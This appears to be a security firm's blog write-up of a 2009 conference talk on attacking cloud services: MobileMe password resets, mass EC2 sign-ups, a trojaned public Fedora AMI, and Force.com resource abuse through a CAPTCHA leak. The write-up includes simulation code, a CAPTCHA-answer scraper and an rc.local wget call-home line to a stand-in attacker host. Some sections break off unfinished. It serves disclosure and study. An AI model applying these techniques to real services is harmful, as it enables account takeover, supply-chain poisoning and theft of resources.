Performing authentication on a massive userbase with whom there is zero offline interaction is hard, especially when it comes down to the degraded authentication required by password reset processes. Considering that web interfaces appear to be the dominant channel by which cloud services are managed (we touch on the implications here), a flawed password reset process can mean that attackers gain access to more than simply your mail.
In August last year, TechCrunch published a way to enumerate usernames on MobileMe. We abused this further to target a specific user on MobileMe in order to reset his password. As the video shows, the process only requires a birthdate (generally obtainable through Facebook, Wikipedia, Amazon wishlists or the like) and the answer to a secret question which, with enough digging, is often guessable. In the video above we show a toy example of the password reset working against a SensePoster.
Apple has since patched this bug.
Finally, we demonstrate the password reset attack against Woz's MobileMe account. We stopped before actually resetting his password, but in his own words he stores mail, calendaring info and other information that is sensitive to him on MobileMe, and the ability to XSS the page would mean that the continued compromise of the account was possible.
Theft of resources is the red-headed step-child of attack classes and doesn't get much attention, but on cloud platforms where resources are shared amongst many users these attacks can have a very real impact. With this in mind, we wanted to show how EC2 was vulnerable to a number of resource theft attacks and the videos below demonstrate three separate attacks against EC2 that permit an attacker to boot up massive numbers of machines, steal computing time/bandwidth from other users and steal paid-for AMIs.
For this video we wanted to consider a DoS on EC2 from within, by running as many AMIs concurrently as possible.
Since sign-up for the service occurred in a browser, it was possible to script the process (using Twill for the most part). The obvious attack would be to boot hundreds or thousands of instances under one Amazon account; however, Amazon enforces an upper bound of 20 running machines per account. Our approach was one step removed from this: we created multiple accounts and then ran 20 machines under each. Each new account would in turn create multiple accounts and run its own 20 machines. One iteration of the create-accounts-and-boot-AMIs cycle took three minutes; by the ninth iteration the projected number of running instances is ridiculous. It's apparent that this recursive registering of accounts and booting of machines means that the number of running machines grows exponentially, and this could continue until the system can't handle the load.
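The growth of this recursive sign-up cycle is easy to project in a few lines of Python. The branching factor of two new accounts per existing account is a hypothetical figure for illustration (we didn't fix a number above); the 20-instance cap and three-minute iteration time are from the text.

```python
# Rough projection of the recursive sign-up attack: every account
# registers BRANCH new accounts per iteration, and each account boots
# the 20-instance maximum Amazon enforces.
BRANCH = 2          # hypothetical: accounts spawned by each existing account
PER_ACCOUNT = 20    # EC2's per-account running-instance cap
MINUTES_PER_ITER = 3

accounts = 1
for i in range(1, 10):
    accounts += accounts * BRANCH        # every account registers BRANCH more
    print(f"iteration {i} (~{i * MINUTES_PER_ITER} min): "
          f"{accounts * PER_ACCOUNT} projected running instances")
```

Even with this conservative branching factor, nine iterations (under half an hour of wall-clock time) projects to hundreds of thousands of instances.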
Our approach was effective because the registration process took no steps to prevent automated sign-up. In testing, a single credit card was used to create our accounts, which is an immediate anomaly; a malicious attacker would instead use stolen card data to ensure that credit card checks did not prevent new account registrations.
As has been mentioned, users can choose AMIs from a list of machines that is mostly user-generated (of some 2,700 machines, 47 were built by Amazon and the remainder by other users). It is easy to add a machine to this list: simply create a new AMI and mark it as 'public' in its properties.
Our idea was to create a malicious AMI and add it to the public listing, with the goal being to show that users will run AMIs without any consideration for who built it or whether nasties were included. We quickly created an AMI, uploaded it and... nothing. No one ran the image and it seemed that people weren't so easily fooled.
Digging a little deeper, however, revealed that when our image was created, it was dumped on the second last page of the AMI listings and so users would have to surf through more than 50 pages of images before coming across our AMI. If Google has taught us anything, it's that ranking counts and so we needed to boost our machine up the AMI listing.
It turns out that the AMI listing is ordered by the AMI ID, which is a random id string that is generated when the AMI is created. Our process was then slightly modified as follows: we scripted the AMI registration process so that it was trivial to register an image. We then looped the registration script to create and register an AMI, and tested to see whether the randomly assigned AMI ID was low enough such that our AMI was listed on the first page.
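The register-and-check loop can be sketched as a toy simulation. The ID format and the first-page threshold below are our assumptions for illustration, and the real attack re-registered an actual AMI through the EC2 interface rather than drawing random strings locally:

```python
import random

# Toy simulation of the listing race: treat an AMI ID as "ami-" plus
# eight random hex characters. The public listing is sorted by ID, so an
# image only lands on the first page if its ID sorts below some
# threshold (the threshold value here is hypothetical).
def random_ami_id(rng):
    return "ami-" + "".join(rng.choice("0123456789abcdef") for _ in range(8))

def race_to_front_page(threshold="ami-01", rng=None):
    """Keep re-registering until the assigned ID sorts before `threshold`;
    return the winning ID and how many registrations it took."""
    rng = rng or random.Random()
    attempts = 0
    while True:
        attempts += 1
        ami_id = random_ami_id(rng)   # in reality: deregister and re-register the AMI
        if ami_id < threshold:        # lexicographic order == listing order
            return ami_id, attempts

ami_id, attempts = race_to_front_page(rng=random.Random(0))
print(ami_id, attempts)
```

Since each draw is independent, the expected number of registrations is simply the inverse of the fraction of the ID space that sorts below the threshold.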
Our first attempt took about 4000 iterations and landed us a top 5 spot in under 12 hours. A subsequent attempt took less than 4 hours to land a top 5 spot.
This was great, but our image was unattractively named 'qscanImage' running on the 'Other Linux' platform, which didn't say much about it.
It turned out that we had a great degree of freedom in naming images. Images were stored in Amazon S3 buckets, and buckets have globally unique names. We tried buckets with names such as 'fedora', 'fedora_core' and 'redhat', but all of these were taken. With a small degree of evilness, however, the bucket 'fedora_core_11' was available and so was registered. The registration race was repeated with the better-named machine, and after a little while we landed the AMI on the front page as shown in the screenshot below:
What's funny is that the machine was the highest listed 'Fedora' AMI, so a user who was specifically looking for a Fedora image would come across our evil image first.
In reality our image did not contain anything malicious except a call-home line in '/etc/rc.local' that would 'wget' a file on our webserver to show the image had been booted. The screenshot below shows the logline from our webserver which proved the image had been booted; this occurred a little under four hours after the image had been made public.
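The call-home line was along these lines; the URL is a placeholder for the webserver we controlled, not the address actually used:

```shell
# Appended to /etc/rc.local inside the AMI: on boot, quietly fetch a file
# from a server we control so the boot shows up in our webserver logs.
wget -q -O /dev/null "http://attacker.example.com/booted?host=$(hostname)" &
```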
Our final Amazon video shows how it is possible to remove ancestry information from AMIs. When a paid-for machine is created, Amazon stores information about the owner of the machine in its manifest (which is an XML document) in order to pay the creator of the image. Our attack works as follows:
We aim to circumvent some of these controls in order to access more resources than should be allowed, and we demonstrate this on the Force.com platform which supports the ability for a developer to upload and execute custom code. Our proof-of-concept was to port Nikto into a Force.com application, and we named it Sifto.
In order to write applications on Force.com, a developer account is required (freely available). Applications are coded in Apex, a Java-like language for business logic that is proprietary to the Force.com platform. The platform supports datastore operations through built-in language constructs, and the API enables a developer to make HTTP callouts, tie Apex code to web service endpoints within Force.com, send emails, and tie Apex code to an email endpoint within Force.com. The datastore is useful for maintaining state between multiple iterations of the event loop (described shortly) as well as providing a way to send emails for free via update triggers (emails sent directly from within Apex code count against the daily limit).
With all this in mind, we focused on creating event loops that were initiated by a single user action, to show how significant free computing resources are available if one is prepared to put in the legwork of learning new languages and platforms.
The event loop method shown in video 1 was still subject to unpublished limits, and so instead of scaling by extending the number of iterations of the event loop, we decided to try and scale by registering many accounts. This was useful since accounts had zero cost. All that remained was to automate the registration process (see the slides for more details on this), and we accomplished this as shown in video 2, where a shell script automatically registered a bunch of accounts. The trick that allowed us to bypass the CAPTCHA in the registration page was a bug in the CAPTCHA script that also provided the image's text in ASCII-text (look for the lines "captcha captured:" in the video).
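A minimal sketch of how such a leak could be scraped, assuming the buggy script emitted the answer as plain text somewhere in the response (the exact response format below is our assumption; the 'captcha captured:' label matches the loglines visible in the video):

```python
import re

# Hypothetical reconstruction of the CAPTCHA bypass: the buggy script
# returned the challenge's answer as plain ASCII text alongside the
# image, so registration could be fully automated. The sample response
# body below is an illustration, not actual Force.com output.
def extract_captcha_answer(response_body):
    """Pull the leaked answer out of a signup-page response, or None."""
    match = re.search(r"captcha captured:\s*(\w+)", response_body)
    return match.group(1) if match else None

sample = "...<img src='/captcha.png'>...\ncaptcha captured: W7KQP\n..."
print(extract_captcha_answer(sample))   # -> W7KQP
```

With the answer in hand, the registration script simply echoes it back into the CAPTCHA field, which is why a plain shell script sufficed in the video.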
Of minor interest was that each account was registered in a different country. Since Salesforce assigns accounts to instances (geographically dispersed clusters) according to the customer's claimed location, we were able to register accounts on both the NA6 and AP1 instances, in North America and Asia Pacific respectively.
[updated: videos will be made available on this page]
140 slides in 75 minutes. They said it couldn't be done... and they were right! (mostly)
Regardless, our Vegas trip was as much fun as in previous years, and our presentations at BlackHat and DEFCON went down well from the looks of things. While we plan on writing up the interesting parts, a number of people have requested access to the slide deck in the meantime, so we've posted it here:
Clobbering the cloud [PowerPoint]
(This is the BlackHat version; the DEFCON deck was trimmed down for time savings.)
[part 2 in a series of 5 video write-ups from our BlackHat 09 talk, summary here]
They have gone to great lengths to avoid common webapp pitfalls, but even they are susceptible to known attacks as shown in the following video.
Our demonstration of Clickjacking focuses on the editing of a user's task list, but the principle is easily carried over to any click-based task.
As if it weren't already obvious, we note that XSS and CSRF attacks become much more than toy attacks in a world where everything is controlled via a web interface.